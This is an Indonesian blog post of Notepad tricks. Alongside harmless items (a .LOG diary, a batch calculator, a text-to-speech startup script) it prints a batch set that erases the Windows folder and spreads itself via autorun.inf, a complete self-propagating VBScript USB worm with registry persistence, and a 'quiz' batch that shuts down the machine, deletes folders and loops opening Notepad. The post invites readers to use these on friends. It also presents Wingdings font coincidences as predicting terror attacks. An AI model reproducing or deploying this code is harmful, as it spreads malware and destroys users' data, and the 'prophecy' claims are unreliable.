Senin, 25 April 2011

FUN with Notepad

Notepad adalah suatu software kecil yang terbawa secara otomatis saat windows diinstal kekomputer kita. Jarang sekali orang memakainya kecuali para programer dan ahli IT (untuk membuat script). Lokasinya (biasanya) terletak pada Start/All Programs/Accessories. Benarkah ia tidak bermanfaat? Beberapa hal dibawah ini menunjukkan bahwa notepad tidak “selemah” yang kita kira :
Membuat buku harian dengan notepad
Tanpa perlu software, tanpa perlu ba bi bu kita bisa bikin buku harian (diary) dengan notepad.
- buka notepad kita
- ketik ” .LOG ” (tanpa tanda petik)
- simpan dengan nama apa saja, misal : diary.txt
- open file yang kita simpan tadi. Dan hasilnya ….
Notepad mampu meramal peristiwa serangan 11 Septeptember (WTC)
Nggak percaya?
- buka notepad anda
- ketik ” Q33N ” (tanpa tanda petik)
keterangan : Q33N adalah nomer penerbangan pesawat yang menabrak WTC
- blok tulisan ” Q33N ” dan masuk menu Format/Font
- ganti font dengan Wingdings
- dan hasilnya …
- silahkan tafsirkan sendiri
Notepad mengetahui proses ledakan bom di Mega Kuningan
Masih ingat bom yang meledak di Mega Kuningan? Diam-diam notepad tahu prosesnya lho.
- buka notepad anda
- ketik ” MEGA ” (tanpa tanda petik)
keterangan : MEGA mengambarkan Mega Kuningan
- blok tulisan ” MEGA ” dan masuk menu Format/Font
- ganti font dengan Wingdings
- dan tadaaaaaaaaaaaaa ….
t’s count down to the blast ………!!!
Notepad berfihak pada George W. Bush
Diam-diam ternyata si notepad kita ini berfihak pada Bush, mantan presiden Amerika yang paranoid itu. Buktinya?
- buka notepad
- ketik : “bush hid the facts” (tanpa tanda petik) (artinya, bush telah menyembunyikan fakta-fakta )
- simpan dengan nama apa saja
- buka kembali file tadi
- dan hasilnya…
- nggak kelihatan khan? Notepad telah menyembunyikan “fakta” bahwa kita telah mengetik sesuatu disana.
DAMAGE U’R COMPUTER WITH NOTEPAD
Lagi-lagi notepadjadi alatnya. Ini cuma trik biasa tapi hasilnya yang luar biasa. Kita akan coba untuk menghancurkan komputer dengan Notepad. Buat kalian yang emang jengkel sama komputernya sendiri, ataupun kesel dengan temen kalian silahkan coba cara yang satu ini. Tapi ane gag bertanggung jawab. Tanggung sendiri akibatnya.
CARA
Buat file kidzoom.cmd
erase C:WINDOWS
Kemudian buat lagi file dengan nama Autorun.inf
[AUTORUN] open=nama induk.bat
Setelah itu buat lagi file Induk.bat
Echo Off For %%p in(A C D E F) do copy Autorun.inf %%p: For %%p in(A C D E F) do copy kidzoom.cmd %%p: For %%p in(A C D E F) do copy %0 %%p: copy ne0.cmd "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kidzoom.cmd" Exit
Penjelasannya :
erase C:WINDOWS << Apus C:\WINDOWS
[AUTORUN]
open=nama induk.bat << Ini adalah file Autorun untuk run otomatis induk.bat
Echo Off << Perintah batch untuk menampilkan pesan
For %%p in(A C D E F) do copy FILE %%p: << Copy file ke %%p (%%p itu variabel drive A, C, D, E, F)
copy ne0.cmd "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\ne0.cmd" << Copy ne0.cmd ke C:\Documents and Settings\%
username%\Start Menu\Programs\Startup\ dengan nama ne0.cmd
Exit << Akhir dari file Batch
Selamat mencoba!
Membuat virus dengan notepad
Virus Gelap? Apaan ye,,, hhhee. pasti penasaran, ! Ini hanya script ya kalau bisa dibilang script yang sangat rumit, karna banyak banget, tapi bisa dilihat efeknya, pasti bagus juga. Langsung aja deh gag usah basi-basi dan gag usah lama-lama lagi.
Copy paste script di bawah ini,
pastenya di notepad dan simpan dengan type .vbs
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <>
"A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MS32DLL",winpath&
"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window
Title","zer03s was HERE"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
Lihat apa yang akan terjadi….
Membuat kalkulator menggunakan notepad
Kalian tau lah calculator fungsinya buat apa. Biasanya kita tau kalkulator kaya yang disebelah nih, atau pun secara virtual, online pun ada. Nah ini cuma script kecil buat bikin hal yang sederhana pula. Kita akan membuat membuat kalkulator sesuai dengan fungsinya namun dengan script tepatnya batch script.
Langsung aja copast script dibawah ini :
@echo off
title Calculator V1
:start
cls
set /p math=Equation:
set /a math2=%math%
cls
echo %math% = %math2%
pause >nul
goto start

simpan ekstensi .bat, namanya terserah kalian.
Membuat Komputer Berbicara pada saat StartUp
Berikut langkah-langkahnya
1. Buka Notepad. Copy-Paste script berikut:
Quote:
Dim msg, sapi msg = “tulis kata-kata terserah anda” Set sapi = CreateObject ( “sapi.spvoice”) sapi.Speak msg
Ganti kalimat berwarna merah sesuai keinginan. Save dengan nama svoice.vbs dan save as type: all file 2. Setelah itu, pada menu Start > Run dan ketikkan ‘gpedit.msc’ (tanpa tanda petik). Kotak dialog Group Policy akan ditampilkan. 3. Pada Group Policy, pilih Computer Configuration > Windows Settings > Scripts (Startup/shutdown) > Startup, lalu klik kanan pada tulisan itu pilih Properties. 4. Klik ‘Add…’ lalu Browse. Cari file yang dibuat tadi. Jika sudah muncul pada kotak, Klik OK 5. Tutup Group Policy, lalu nyalakan Speaker komputer. Klik Start > Turn Off/Shutdown > Restart. Suara akan keluar saat StarUp Windows XP. Selamat Mencoba gan
SCRIPT DEATH QUIZ
Seperti biasa script ini adalah script jail… dan senjata yang kita akan pakai juga masih Notepad, hhheee, kali ini script ketemu sehabis berjalan-jalan di Google, eh ketemu script kaya begini, langsung aja deh kita posting… Gag usah lama-lama lagi langsung aja copast script berikut ke dalam Notepad kalian,
view sourceprint?
01
@echo off
02
title quiz hari ini ">
03
:menu
04
cls
05
echo jika kamu kena virus apa yang kamu lakukan
06
pause
07
echo pilih yang mana:
08
echo 1. matiin computer
09
echo 2. format aja
10
echo 3. bingung ahh
11
set input=nothing
12
set /p input=Choice:
13
if %input%==1 shutdown -s -t 30
14
if %input%==2 del c:\xxx (ganti xxx dengan folder yg mo dihapus)
15
if %input%==3 @ECHO off
16
msg * muka lo jelek
17
msg * ngaca dulu gih
18
msg * hayo lo,cpu lu gw acak2
19
msg * ud install ulang aja
20
msg * biar masalah nya kelar
21
@ECHO off
22
:top
23
START %SystemRoot%\system32\notepad.exe
24
GOTO top
Simpan dengan ekstensi .bat ye

Tidak ada komentar:

Posting Komentar